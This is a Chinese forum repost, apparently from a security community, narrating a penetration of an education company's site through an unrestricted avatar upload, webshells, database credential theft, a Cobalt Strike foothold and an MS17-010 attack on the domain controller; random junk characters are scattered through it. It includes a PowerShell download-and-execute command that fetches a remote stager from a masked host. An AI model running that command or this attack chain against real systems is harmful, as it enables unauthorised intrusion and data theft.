|
! P. L5 |& M6 ^5 e: W% | 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
) s& S/ {# K& m
& W7 n6 M) N, _2 L, P2 q. c4 s* F% Q7 n8 h8 R/ y# {
6 p6 O$ x: }/ _5 k( i; t5 [ {# ~8 o% ~9 J+ [
- D0 l+ @! E' @* V7 f
5 r' q* f `; c
正文. D. M( E) U/ {
. V2 O2 z h5 _0 d, j
% s6 R1 S/ b! `) q! v 1 h6 s4 x* \2 t; q) J8 i
' z3 M1 F0 U1 u, r4 @" }7 L
2 I; r b+ r, h 目标:www.xxxx.com(一家教育机构)
8 j6 ]5 q ?5 ?( F( Q: r打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能' ~3 f; M. u7 A) D% t
. I& X2 ]" \: h- J" W1 H, {6 _8 a7 f3 u" h' |, b4 Q
 ( Z* E1 h4 B& `6 b0 b
3 T4 N9 Q0 V( t* Z+ ~
l$ i: @5 c! x" u6 h, z 进行了简单的信息搜集
: f6 ?, V8 o- L
' ]% g5 ~& \% U3 j
! s( B% x9 c8 ^* P% Y
4 x! [/ e( Y( S7 r0 n
- t0 r$ e) h9 D8 ? X9 H& H5 y 子域名搜集
0 z! G7 o$ T( b0 l
* ^# E' i \4 E1 g: h7 g8 I) f
1 k( t R: D( _# h* s3 a  3 e' Z* b$ U5 Q! i0 Y" c
! g' f: [: @! V/ z" B9 s$ P1 }$ G% O' ~
fofa找资产
$ @7 S3 H* N O
, r! d) G) x) t9 w. E$ q( y9 |# b* `6 n; V
6 { E; [: S' D- q: ~ H: ^2 k6 C2 i
8 R6 B* B `8 G3 ~2 ~  ; H7 ^' X, a$ L, c! p! Y
2 M P; D" J/ H0 V% w& \+ C4 v3 o! z w4 w
一共七个资产。去重之后只有两个。
0 z% N6 U9 A( J' X
5 C1 Z; I' X8 ]5 X e5 i: \0 v- ~0 i& s G4 Z3 s- w
7 w2 Q4 x$ E* N) M) ?
* ]8 A! X; Y1 x" X0 m 目录探测6 J5 Y1 u" T! I5 B. G
4 _) g$ [; E* G% F7 o. o- B, R. Q& `0 V8 |" q6 R9 n
 , q$ s( k! {4 O! x
) k' T' h s& ~) i, @
9 {( @8 _/ t0 H$ X& T. ]
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ r. q9 N# i, ^# P! [; ~$ I
) ]" }. ^) f5 g; u( j( |' V% I
' \) v8 g/ V8 [% @7 a0 J* O! d
- d. |+ E! s/ |9 {+ \/ Z2 o
. V0 j1 t9 ?# d: W7 u 我又尝试了通过修改返回包来绕过登录界面, P+ h0 j d# `
% W9 t9 U2 V* C' n
' V; d- k7 w. L4 W  ! Z1 _0 y8 G0 L R8 [& q3 e3 R
6 N, O% _! r9 E4 Z% j6 |
; S, o* h" p3 Z. Y
还是不行,尝试注入无果9 H, H7 t' \4 J
7 V" @+ C- n) \) E) T6 }7 j
- l# e! o: v& B1 Z( c. E" W6 Z7 g& R 
" {! h1 X. W l# Y2 N2 E * h7 e# `1 |( r! l! l I6 ~
# D/ L/ |! H5 k
不过我目录探测出了一处Spring信息泄露
$ O t# `" Z7 D0 a8 v3 r
) `- D5 l R+ |0 k& R! z& v
+ @, Y7 u n* [7 H
* R0 u* a3 P% T: q1 p; q) ]* k+ C6 G( A S w
6 w6 m: J" E6 H' F& O" A' y
' e; K- a& h# A1 W+ N& R$ n3 \2 T" P2 e( ?7 n, U
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
2 {5 S* Y* Q' G7 p # k5 M" F" k& d( `0 R T! K
( p% s+ \8 M7 X, C# Z3 ^8 T) |
) T8 C4 E! h! H* c" `' x% ~
' V( u5 j# g6 j
, t8 _' c) C7 q- `9 Q" ]' c 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。) s+ N& [/ Y; P" M4 L/ \
3 e9 C& m7 d- d
$ _1 ]8 ^: |7 A. V2 x2 m6 K 
- |* e; N% C$ h( {" ]: p
% P: _/ B- |" F# v3 R( R- g0 @& r4 S% \
获取有些师傅到这一步就手机抓包电脑测了。
. X! ?# \8 T$ H! H' f- m# A0 j4 ~ ( L+ E' u4 Z) z* J
4 n2 W. b$ f9 D Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
0 [6 u$ B7 w8 [0 {7 n. w5 V3 w# u
( m7 H4 q# W9 Q) D' L
: k: l' U, t' n2 t 其中在一个公众号发现了小程序,可以进行注册。7 {8 R2 L6 D5 L4 f, g
7 ^; B, b% \8 b1 i- C
4 l! @+ p& e1 q/ ?$ d2 N- I2 v
看到了头像上传,尝试上传获取WebShell0 F( Z( J# y6 ~
8 ~- ]3 ~5 }! ~# q
; N2 q9 p) E3 S I+ F( ~  & A0 Y3 z9 l( c( r: Q
1 e0 g& g& X0 X3 \3 M1 I
" D! A4 b: p' t6 h! Z 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
I5 J; U6 e- B" d! h2 x 2 y, r5 v d2 L) m9 q$ p) n: i$ s% m
: B% ^: I4 B& _* Q7 G
 & N3 X- k) {# Y& l" v+ M4 C( a
6 C3 @7 v* M" d$ Y$ \9 D8 u* l
/ P8 s! s, s n" z
然后上了大马9 a7 f8 T5 i0 ~: G
0 f! {9 q% W9 E% \2 A9 q
1 y( d- Z4 e+ q4 h/ Z  ) F0 ]: a3 ^3 Q8 L& S
" `5 i, J1 Z# ^1 \/ d) A# N) }& s
& }3 z- ~4 u& K  / O x# h) o2 m
7 x, e" {* N5 a( J) W+ _
' ^% O2 s2 u0 g8 v/ O+ B+ E, G) R
通过翻找文件发现数据库账号密码; D x) W& r: p
( k% o* p; ^$ J; V" ?
; h! p/ V0 B0 y, t
5 ?+ S" |* I! y3 x, M7 z5 R; i: s
; n' O' Q+ G$ w' y) `8 l8 Q$ Q& v5 W9 ?, z1 u4 K3 z
--内网渗透; _2 ~* Z0 B: l/ }8 C* M! R
! y L, b* ~6 l5 M) R, d; D' ^" q, g% z/ j8 O
直接通过powershell执行 cs上线
' C$ X! K( Y( T- F4 I# J- D
( E* h3 C% {0 D6 E
9 O/ g( M: V1 n# ~# F4 Q, i. X powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
@. k! y$ Z; I$ v7 ?4 G 0 O# o" \! d- a" G5 R
5 L7 [& ]5 Y3 w& H  " M. ? F0 b, Y( |, Q
4 B: e4 `1 N. P( m+ V \2 s! Y' J3 M' v" O! p8 n
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破! h# N1 k$ _3 ^% y5 P% n1 C4 N3 a0 ?4 S
; I* R$ o* m) w" G
. C) p5 M. o! {: P) Z4 t 
) B6 `/ l: B( T K3 L y9 I" t7 w" I+ s, M) s2 w
2 o6 O% {" U( c) ^8 x& f4 B4 T
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% w: E, t, a5 U. U; i! ?
+ r% i- v! t8 _' ~% `
) h0 Z' A3 V5 u! |) u
& |2 d2 L$ A+ Q( { 2 I$ D9 N7 ]! f; n
* f" w+ ?: k( {6 W3 W
 1 z2 Q) h: ?- z, M
5 T" O6 D2 B; x2 n4 f$ W
# n4 f+ j# Q1 _6 |. Z. ^3 f0 \% P
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ m( H( ?3 e/ c. F+ f7 ^" ?% @
/ Z7 ^7 X# a4 X8 M7 Y
- j# ]5 U, _7 A. S/ v
; G0 e% x$ u r
1 @6 `9 A& E9 e _& ^' @ e, M  5 c x& ` Q: z* u8 X
4 y1 S R9 J4 k9 {( J# P
0 Z5 i6 E% q* Z
5 b9 Y3 C; h- B! ~$ i8 s/ e
8 |3 }! S2 N5 s0 k$ R8 Q6 U$ P$ J4 j" L; r) Q# ^5 W% D
1 f* x6 n( Z8 n2 b: d
. E* p0 V- Y, X0 ~; K! h7 o
, O$ N% }. [% P! U & n5 u/ A# f* g, X, D3 h
% X" y7 B9 V5 F# a9 x/ z; Q 小结" h( | `# s8 _8 x: y7 u( z7 `; {
/ \7 }3 q1 {! S7 L
! F% Q9 t# s3 x( G, ~3 U/ g4 u 4 u5 o# l& {, [4 Z# G: o- {
( H0 m; d: A! e4 V! U
" Z9 j# |% E2 C
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
* l$ @1 S" x; _
1 L& _, O3 ^: Q* ^6 W8 [
6 Q7 O5 ^/ s0 ` E6 ?) n5 ? ) D9 |" j V# S8 i; |
% f, s+ h) Z& y! |. P' a+ _% m6 j3 v% ?
-
) ?; Q( \( h' U5 Z2 R) l0 q u+ f + D7 ~* u/ T+ G( v
8 `- C! s% ]) ?: m) T7 e5 U2 C -
- g) q- v1 I; Y E 0 v6 Z9 L0 x2 Q7 L' E- X
# S/ U& h0 E. _, b k8 `! o
V4 c8 u3 f" t( I, ?: u. T) a# i# h
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
1 Y* a `8 O* K: \- V8 S \) d . [3 f3 M. W# u& N9 `5 h
( c* B* ^+ P6 X; |
; `5 l- f4 \. }6 j2 V7 e | 
发表于 2024-3-1 19:41:32
收藏
支持
反对